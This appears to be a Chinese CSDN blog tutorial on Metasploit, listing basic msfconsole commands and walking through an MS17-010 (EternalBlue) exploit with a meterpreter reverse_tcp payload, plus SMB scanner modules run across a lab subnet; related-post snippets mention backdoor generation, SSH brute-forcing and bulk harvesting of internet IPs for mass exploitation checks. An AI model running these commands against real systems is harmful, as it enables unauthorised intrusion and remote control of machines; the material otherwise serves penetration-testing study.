metasploit中msf批量监测

最新推荐文章于 2024-05-14 11:40:31 发布
最新推荐文章于 2024-05-14 11:40:31 发布
阅读量977 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sforce/article/details/117117936
版权

1.基础命令使用及其介绍
search 搜索命令
        search cve 其中 excellent为可利用漏洞

use 使用命令
        use exploit/windows/local/windscribe_windscribeservice_priv_esc

info 显示信息命令

check 检测命令
        检测木匾是否选定渗透攻击存在相应的安全漏洞

set  设置命令
        set RHOST + 目标ip  设置目标ip地址
        set LHOST  + 本机ip  设置本机ip地址

run    运行命令

back     返回命令

quit    退出命令

2.ms17-010案例演示

search ms17-010        查询ms17-010

 

use 2                使用第二条漏洞

 

show options            查看需要配置的参数
        required 为yes 是必须要配置的参数

 

set RHOST 192.168.0.109         设置目标主机的IP地址为192.168.0.104
set payload windows/x64/meterpreter/reverse_tcp            设置payload

 

show options             继续查看需要配置的参数

 

set LHOST 192.168.0.104              由于是反向连接需要设置自己主机的IP地址

 

run                    运行

 

运行smb模块探测主机445端口开放情况。

use auxiliary/scanner/smb/smb_version
set rhosts 192.168.236.129/24
set threads 16
run

使用smb_ms17_010模块探测MS17-010漏洞

use auxiliary/scanner/smb/smb_ms17_010
show options
set threads 16
services -r tcp -p 445 -R
run

注:如果更新完msf出现才下问题
root@kaliew:~# msfconsole

[*] Bundler failed to load and returned this error:

   'cannot load such file -- bundler/setup'

[*] You may need to uninstall or upgrade bundler

解决方法:

apt-get  install metasploit-framework 

gem install bundler

 

键盘遇上小怪兽
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
使用MSF批量探测内网MS17-010漏洞
2301_77147728的博客
03-29 835
探测MS17-010可以先通过smb模块扫描出开放了445端口的主机,然后再使用MS17-010模块进行漏洞探测。这种方法适不仅适用于MS17-010漏洞的探测。如果默认没有链接的话可以先自己装一个postgresql数据库,然后新建一个名为msf的库,在msf执行命令连接:db_connect postgres:[email protected]:5433/msf。首先启动数据库:service postgresql start。扫描完成后,扫描的信息会自动存入数据库,可通过hosts命令查看。
MSF详解及常用命令之利用msf控制目标电脑
世间繁华梦一出
12-21 2546
MSF基本操作详解序言:MSF简介1、模块介绍2、基本命令3、后渗透4、msfvenom生成后门木马 ** 序言:MSF简介 Metasploit简称msfMetasploit是一款开源的安全漏洞检测工具,可以帮助安全和IT专业人士识别安全性问题,验证漏洞的缓解措施,并管理专家驱动的安全性进行评估,提供真正的安全风险情报。这些功能包括智能开发,代码审计,Web应用程序扫描,社会工程。团队合作,在Metasploit和综合报告提出了他们的发现。 ** 1、模块介绍 它是一个渗透测试框架(模块介绍) auxi
metasploit文操作手册
01-30
metasploit文操作手册 Metasploit® 软件帮助安全专家和IT 专家识别安全问题、验证漏洞修复情况,并管理由 专家执行的安全评估。该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。 Metasploit 帮助团队进行协作,并在整合的报告显示其发现结果。
Metasploit 文手册.pdf
06-27
Metasploit软件帮助安全专家和 IT 专家识别安全问题、验证漏洞修复情况,并管理由专家执行的安全评估。 该产品提供真正的安全风险智能,帮助用户保护数据抵御攻击。 本 POC 指南的内容涉及智能入侵测定、密码审计、web 应用程序扫描和社会工程。Metasploit 帮助团队进行协作,并在整合的报告显示其发现结果。
批量监控主机方法2-使用rhost来实现
03-19 474
先建立对等主机信息。对于aix,我们需要配置下面的几个文件/etc/.rhosts/etc/hosts.equiv/etc/hosts$HOME/.rhosts 这里是为了在192.168.0.1上执行rsh命令,可以按照...
msfconsole 控制台使用和操作
热门推荐
xianjie0318的博客
08-07 2万+
Msfconsole提供了一个一体化的集控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集。对于...
MSF模块爆破SSH
HAKUNAMATATATTA的博客
11-28 2469
msf爆破模块的使用
MSF小练习——MSF的arp_sweep主机存活扫描
ptxybird的博客
08-13 2782
原理:在TCP/IP网络环境,一台主机在发送数据帧前需要使用ARP(Address Resolution Protocol,地址解析协议)将目标IP地址转换成MAC地址,这个转换过程是通过发送一个ARP请求来完成的。如IP为A的主机发送一个ARP请求获取IP为B的MAC地址,此时如果IP为B的主机存在,那么它会向A发出一个回应。因此,可以通过发送ARP请求的方式很容易地获取同一子网上的活跃主机情况,这种技术也称为ARP扫描。Metasploit的arp_sweep模块便是一个ARP扫描器。 第一步:在打
渗透测试神器-msf基础
qq_51796436的博客
12-01 5040
渗透测试在远控,权限维持阶段不可避免的要用到msf,在awd也会经常用到,msf的功能不可谓不强大
MSF渗透测试
weixin_51646864的博客
08-12 1024
MSF入门实验
Metasploit 文 Wiki
05-05
Metasploit 文 Wiki Metasploit 文 Wiki Metasploit 文 Wiki
metasploit文使用详解.pdf
08-14
metasploit文使用详解.pdf
Metasploit MacOs版本
08-04
在只有Mac电脑的前提下,虽然可以装虚拟机,但是执行速度略慢,所以不如直接装MSF.pmg
使用msfMetasploit Framework)检测MS17-010(永恒之蓝)
sanMu_blog的博客
07-02 1万+
今天是入职的第一天,还是有点忐忑,新地点新事物,希望自己的选择没有错,努力!废话不多说,入职后被安排的第一件事情,就是在Ubuntu环境下搭建msfmetasploit framework渗透框架),然后下午去做渗透测试。个人习惯Windows系统,于是在VMware内安装Ubuntu,由于电脑有VMware,具体的安装就不说了,Ubuntu安装教程本人参考的是Ubuntu安装教程,msf教程是...
Metasploit(MSF)实战_永恒之蓝漏洞拿下win7靶机
monster663的博客
02-06 4602
声明:本文仅做学习交流探讨之用,切勿用于违法用途,请遵循《华人民共和国网络安全法》,共同维护清朗的网络空间 一、Metasploit(MSF)简介 Metasploit与2003年由H.D.Moore发布,是一款开源的安全漏洞检测工具,通过它可以很容易的对计算机软件的漏洞实施攻击,其本身已经附带数百个已知的软件漏洞,从此,每个人都可以成为黑客,任何人都可以使用常见的攻击攻击一台计算机,软件厂商也不能够再推迟对于已经发布的漏洞的补丁。 Metasploit主要包含以下几个模块: 1.辅助模块(Aux
FOFA批量提取ip然后放入到MSF进行漏洞批量验证
yy
04-15 5748
利用fofa批量获取ip。因为将获取的ip放入到MSF,因为rhosts只能是纯ip不能携带http以及端口号,所以这里先提取ip出来再去杂。 1. fofa提取的结果如下 2. 去除https和端口号,脚本如下 with open('./VMWare vCenter.txt','r',encoding='utf-8') as f: for line in f: #去除'//'' a = line.split('//',1)[-1] if ":" in a: a = ..
msf rhosts设置文件_msf系列之大牛黑客必须学的控制台命令
weixin_39825322的博客
11-06 946
1、 Msfconsole提供了一个一体化的集控制台。通过msfconsole,你可以访问和使用所有的metasploit的插件,payload,利用模块,post模块等等。Msfconsole还有第三方程序的接口,比如nmap,sqlmap等,可以直接在msfconsole里面使用。 在启动MSF终端之后,可以首先输入help命令列出MSF终端所支持的命令列表,包括核心命令集和后端数据库命令集...
Shadow broker=>fuzzbunch+metasploit 攻击外网测试以及metasploit批量扫描目标IP
Berry2014的博客
04-20 962
0x01 前言 4月14日,影子经纪人在steemit.com上公开了一大批NSA(美国国家安全局)“方程式组织” (Equation Group)使用的极具破坏力的黑客工具,其包括可以远程攻破全球约70%Windows机器的漏洞利用工具。一夜之间,全世界70%的windows服务器置于危险之,国内使用windows服务器的高校、国企甚至政府机构也不能幸免。 据了解,受影响的Wi...
PHP开发的医院安全(不良)事件系统源码 医院不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
最新发布
爱笑的源码博客
05-14 976
医疗安全不容忽视! 医疗不良事件有哪些?又该怎样分类呢?也许这篇文章能给予你答案。
msf批量爆破ssh
10-01
MSFMetasploit Framework)是一个开源的渗透测试工具,它包含了各种模块和工具,用于发现漏洞、分析和执行攻击等操作。在Metasploit,可以使用msfconsole命令进行交互式操作。 要进行批量爆破SSH,首先需要准备...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值